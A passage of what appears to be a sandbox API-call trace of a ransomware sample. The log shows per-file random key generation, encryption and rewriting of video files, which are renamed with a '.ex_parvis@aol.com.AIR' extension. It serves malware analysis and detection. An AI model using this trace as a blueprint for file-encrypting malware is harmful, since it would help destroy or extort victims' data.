	[0107.128] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.128] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.129] ReadFile (in: hFile=0x55c, lpBuffer=0x629bb8, nNumberOfBytesToRead=0x725e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x629bb8*, lpNumberOfBytesRead=0x3a1f778*=0x725e, lpOverlapped=0x0) returned 1
	[0107.130] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.130] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.130] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\ns0YcNqg C_ca6TOKz.flv", dwFileAttributes=0x80) returned 1
	[0107.130] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\ns0YcNqg C_ca6TOKz.flv") returned 77
	[0107.130] GetProcessHeap () returned 0x540000
	[0107.130] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8670
	[0107.130] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\ns0YcNqg C_ca6TOKz.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\ns0YcNqg C_ca6TOKz.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\ns0YcNqg C_ca6TOKz.flv"
	[0107.130] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\ns0YcNqg C_ca6TOKz.flv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\ns0YcNqg C_ca6TOKz.flv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\ns0YcNqg C_ca6TOKz.flv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.130] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\ns0YcNqg C_ca6TOKz.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\ns0ycnqg c_ca6tokz.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\ns0YcNqg C_ca6TOKz.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\ns0ycnqg c_ca6tokz.flv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.133] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\ns0YcNqg C_ca6TOKz.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\ns0ycnqg c_ca6tokz.flv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c
	[0107.133] GetProcessHeap () returned 0x540000
	[0107.133] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0107.133] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=28038) returned 1
	[0107.133] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x6d86
	[0107.133] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.133] GetProcessHeap () returned 0x540000
	[0107.133] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.133] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.135] WriteFile (in: hFile=0x55c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.135] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.136] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.136] ReadFile (in: hFile=0x55c, lpBuffer=0x629bb8, nNumberOfBytesToRead=0x6d86, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x629bb8*, lpNumberOfBytesRead=0x3a1f778*=0x6d86, lpOverlapped=0x0) returned 1
	[0107.137] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.137] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.137] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\JJ O2LcoQdVK_NNWh.flv", dwFileAttributes=0x80) returned 1
	[0107.137] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\JJ O2LcoQdVK_NNWh.flv") returned 76
	[0107.137] GetProcessHeap () returned 0x540000
	[0107.137] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8670
	[0107.137] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\JJ O2LcoQdVK_NNWh.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\JJ O2LcoQdVK_NNWh.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\JJ O2LcoQdVK_NNWh.flv"
	[0107.137] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\JJ O2LcoQdVK_NNWh.flv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\JJ O2LcoQdVK_NNWh.flv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\JJ O2LcoQdVK_NNWh.flv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.137] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\JJ O2LcoQdVK_NNWh.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\jj o2lcoqdvk_nnwh.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\JJ O2LcoQdVK_NNWh.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\jj o2lcoqdvk_nnwh.flv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.140] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\JJ O2LcoQdVK_NNWh.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\jj o2lcoqdvk_nnwh.flv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c
	[0107.140] GetProcessHeap () returned 0x540000
	[0107.140] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0107.140] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=34305) returned 1
	[0107.140] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x8601
	[0107.140] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.140] GetProcessHeap () returned 0x540000
	[0107.140] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.140] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.140] WriteFile (in: hFile=0x55c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.141] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.141] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.142] ReadFile (in: hFile=0x55c, lpBuffer=0x629bb8, nNumberOfBytesToRead=0x8601, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x629bb8*, lpNumberOfBytesRead=0x3a1f778*=0x8601, lpOverlapped=0x0) returned 1
	[0107.143] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.143] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.143] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\CsFoj5a.mp4", dwFileAttributes=0x80) returned 1
	[0107.143] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\CsFoj5a.mp4") returned 66
	[0107.143] GetProcessHeap () returned 0x540000
	[0107.143] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xea) returned 0x56b448
	[0107.143] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\CsFoj5a.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\CsFoj5a.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\CsFoj5a.mp4"
	[0107.143] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\CsFoj5a.mp4", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\CsFoj5a.mp4.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\CsFoj5a.mp4.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.143] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\CsFoj5a.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\csfoj5a.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\CsFoj5a.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\csfoj5a.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.146] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\CsFoj5a.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\csfoj5a.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c
	[0107.146] GetProcessHeap () returned 0x540000
	[0107.146] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0107.146] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=97732) returned 1
	[0107.146] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x17dc4
	[0107.146] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.146] GetProcessHeap () returned 0x540000
	[0107.146] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.146] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.148] WriteFile (in: hFile=0x55c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.148] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.148] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.149] ReadFile (in: hFile=0x55c, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x17dc4, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x17dc4, lpOverlapped=0x0) returned 1
	[0107.151] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.151] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.151] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\6IjMne30p.flv", dwFileAttributes=0x80) returned 1
	[0107.152] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\6IjMne30p.flv") returned 68
	[0107.152] GetProcessHeap () returned 0x540000
	[0107.152] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xee) returned 0x56b448
	[0107.152] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\6IjMne30p.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\6IjMne30p.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\6IjMne30p.flv"
	[0107.152] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\6IjMne30p.flv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\6IjMne30p.flv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\6IjMne30p.flv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.152] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\6IjMne30p.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\6ijmne30p.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\6IjMne30p.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\6ijmne30p.flv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.154] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\6IjMne30p.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\6ijmne30p.flv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c
	[0107.154] GetProcessHeap () returned 0x540000
	[0107.154] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0107.155] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=69176) returned 1
	[0107.155] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x10e38
	[0107.155] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.155] GetProcessHeap () returned 0x540000
	[0107.155] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.155] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.157] WriteFile (in: hFile=0x55c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.158] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.158] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.159] ReadFile (in: hFile=0x55c, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x10e38, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x10e38, lpOverlapped=0x0) returned 1
	[0107.161] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.161] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.161] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\5QaUaFvAmh1GSJTo.mp4", dwFileAttributes=0x80) returned 1
	[0107.161] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\5QaUaFvAmh1GSJTo.mp4") returned 75
	[0107.161] GetProcessHeap () returned 0x540000
	[0107.161] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8670
	[0107.161] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\5QaUaFvAmh1GSJTo.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\5QaUaFvAmh1GSJTo.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\5QaUaFvAmh1GSJTo.mp4"
	[0107.161] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\5QaUaFvAmh1GSJTo.mp4", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\5QaUaFvAmh1GSJTo.mp4.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\5QaUaFvAmh1GSJTo.mp4.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.161] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\5QaUaFvAmh1GSJTo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\5qauafvamh1gsjto.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\5QaUaFvAmh1GSJTo.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\5qauafvamh1gsjto.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.163] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\5QaUaFvAmh1GSJTo.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\5qauafvamh1gsjto.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c
	[0107.164] GetProcessHeap () returned 0x540000
	[0107.164] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0107.164] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=63080) returned 1
	[0107.164] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xf668
	[0107.164] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.164] GetProcessHeap () returned 0x540000
	[0107.164] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.164] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.166] WriteFile (in: hFile=0x55c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.166] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.167] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.167] ReadFile (in: hFile=0x55c, lpBuffer=0x37b1048, nNumberOfBytesToRead=0xf668, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0xf668, lpOverlapped=0x0) returned 1
	[0107.169] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.169] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.169] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\-Q-C08DmTzq.mp4", dwFileAttributes=0x80) returned 1
